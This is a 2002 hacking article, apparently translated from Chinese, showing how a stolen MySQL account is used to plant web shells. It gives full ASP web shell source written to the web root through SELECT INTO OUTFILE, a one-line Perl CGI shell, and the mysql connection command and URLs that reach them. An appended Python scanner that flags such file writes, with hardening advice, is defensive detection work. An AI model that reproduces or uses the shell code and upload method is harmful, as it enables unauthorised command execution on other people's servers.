            Carrying out an attack using a MySQL hosting-space password
            Www.cshu.net  2002-8-18  fog rain village 

              One day I happened to obtain the MySQL account of a website
              and found that its home page was located in c:\www\www. I
              first downloaded a cmd.asp script from the Internet, then
              wrote a cmd.sql script to upload cmd.asp into that directory
              over the MySQL connection. The content of cmd.sql is as
              follows:
              Use test; 
              Create table tmp (cmd TEXT); 
              Insert into tmp values ("<%@ Language=VBScript %>"); 
              Insert into tmp values ("<%"); 
              Insert into tmp values ("Dim oScript"); 
              Insert into tmp values ("Dim oScriptNet"); 
              Insert into tmp values ("Dim oFileSys, oFile"); 
              Insert into tmp values ("Dim szCMD, szTempFile"); 
              Insert into tmp values ("On Error Resume Next"); 
              Insert into tmp values ("' -- create the COM objects that we will be using -- '"); 
              Insert into tmp values ('Set oScript = Server.CreateObject ("WSCRIPT.SHELL") '); 
              Insert into tmp values ('Set oScriptNet = Server.CreateObject ("WSCRIPT.NETWORK") '); 
              Insert into tmp values ('Set oFileSys = Server.CreateObject ("Scripting.FileSystemObject") '); 
              Insert into tmp values ("' -- check for a command that we have posted -- '"); 
              Insert into tmp values ('szCMD = Request.Form ("CMD") '); 
              Insert into tmp values ('If (szCMD "") Then'); 
              Insert into tmp values ("' -- Use a poor mans pipe... a temp file -- '"); 
              Insert into tmp values ('szTempFile = "C:\" & oFileSys.GetTempName () '); 
              Insert into tmp values ('Call oScript.Run ("cmd.exe /c" & szCMD & ">" & szTempFile, 0, True) '); 
              Insert into tmp values ('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) '); 
              Insert into tmp values ("End If"); 
              Insert into tmp values ("%>"); 
              Insert into tmp values ("<HTML>"); 
              Insert into tmp values ("<BODY>"); 
              Insert into tmp values ('<FORM action= "<%= Request.ServerVariables ("URL") %>" method= "POST" >'); 
              Insert into tmp values ('<input type=text name= "CMD" size=45 value= "<%= szCMD %>" >'); 
              Insert into tmp values ('<input type=submit value= "Run" >'); 
              Insert into tmp values ("</FORM>"); 
              Insert into tmp values ("<PRE>"); 
              Insert into tmp values ('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>'); 
              Insert into tmp values ("<br>"); 
              Insert into tmp values ("<%"); 
              Insert into tmp values ("If (IsObject (oFile)) Then"); 
              Insert into tmp values ("' -- Read the output from our command and remove the temp file -- '"); 
              Insert into tmp values ("On Error Resume Next"); 
              Insert into tmp values ("Response.Write Server.HTMLEncode (oFile.ReadAll)"); 
              Insert into tmp values ("oFile.Close"); 
              Insert into tmp values ("Call oFileSys.DeleteFile (szTempFile, True)"); 
              Insert into tmp values ("End If"); 
              Insert into tmp values ("%>"); 
              Insert into tmp values ("</BODY>"); 
              Insert into tmp values ("</HTML>"); 
              Select * from tmp into outfile "c:\\www\\www\\234.asp"; 
              Drop table tmp; 
              When adding content to the table with insert into, the whole
              content cannot be added with a single insert into; it has to
              be added line by line, otherwise an error occurs, so every
              line must have its own insert into.
              Then make the connection:
              C:\mysql\bin\mysql -u user -p password -h ip <cmd.sql 
              If the prompt comes back as:
              C:\mysql\bin\ 
              then the asp file was created successfully!
              Then open:
              Http:\\www.xxx.com/234.asp 
              This gives an ordinary user's shell! The first step has
              succeeded, and becoming the super user will not be a
              difficult matter!
              If a CGI file is uploaded through mysql instead, it does not
              need to be that long. cmd.sql:
              Use test; 
              Create table tmp (cmd TEXT); 
              Insert into tmp values ('system @ARGV'); 
              Select * from tmp into outfile "c:\\www\\www\\234.cgi"; 
              Drop table tmp; 
              Then a request to http:\\www.xxx.com/234.cgi? Dir c:\ likewise
              gives an ordinary user's shell!
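
Both the .asp and the .cgi variant above depend on one database action: a SELECT ... INTO OUTFILE whose target is a script file in the web root. The following is an added example, not part of the original article, that scans logged SQL statements for that pattern; the log lines, the `d:/exports` directory and all function names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Extensions a web server may execute; the article writes .asp and .cgi files.
SCRIPT_EXTS = {".asp", ".aspx", ".cgi", ".php", ".jsp", ".pl"}

# SELECT ... INTO OUTFILE|DUMPFILE '<path>' (either quote style, escapes allowed).
OUTFILE_RE = re.compile(
    r"\binto\s+(?:outfile|dumpfile)\s+(['\"])((?:\\.|(?!\1).)*)\1",
    re.IGNORECASE | re.DOTALL)

def unescape(literal):
    # Drop the escaping backslash: exact for \\ and quotes, enough for paths.
    return re.sub(r"\\(.)", r"\1", literal)

def is_under(path, root):
    # PureWindowsPath compares case-insensitively and accepts / or \.
    root = PureWindowsPath(root)
    return path == root or root in path.parents

def find_file_writes(statement, web_roots=(), export_dir=None):
    """Return (path, reasons) for each suspicious file write in one statement."""
    findings = []
    for m in OUTFILE_RE.finditer(statement):
        path = PureWindowsPath(unescape(m.group(2)))
        reasons = []
        if path.suffix.lower() in SCRIPT_EXTS:
            reasons.append("script extension")
        if any(is_under(path, r) for r in web_roots):
            reasons.append("inside web root")
        if export_dir and not is_under(path, export_dir):
            reasons.append("outside export dir")
        if reasons:
            findings.append((str(path), reasons))
    return findings

def scan(log_lines, **policy):
    """Return (line_number, path, reasons) for every flagged log line."""
    return [(n, path, reasons)
            for n, line in enumerate(log_lines, 1)
            for path, reasons in find_file_writes(line, **policy)]

# Constructed query-log entries for illustration, not from a real server.
SAMPLE_LOG = [
    r'12 Query  create table tmp (cmd TEXT)',
    r'12 Query  select * from tmp into outfile "c:\\www\\www\\234.asp"',
    r"13 Query  SELECT * FROM orders INTO OUTFILE 'd:/exports/orders.csv'",
    r"14 Query  select * from tmp INTO DUMPFILE 'C:\\WWW\\www\\notes.txt'",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, web_roots=[r"c:\www\www"], export_dir="d:/exports"):
        print(hit)
```

Revoking the FILE privilege from web-application accounts and setting MySQL's secure_file_priv to a dedicated export directory removes this write path altogether; the scan is for servers where that has not been done yet.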



              Original author: N/A 
              Origin: The small phoenix occupies 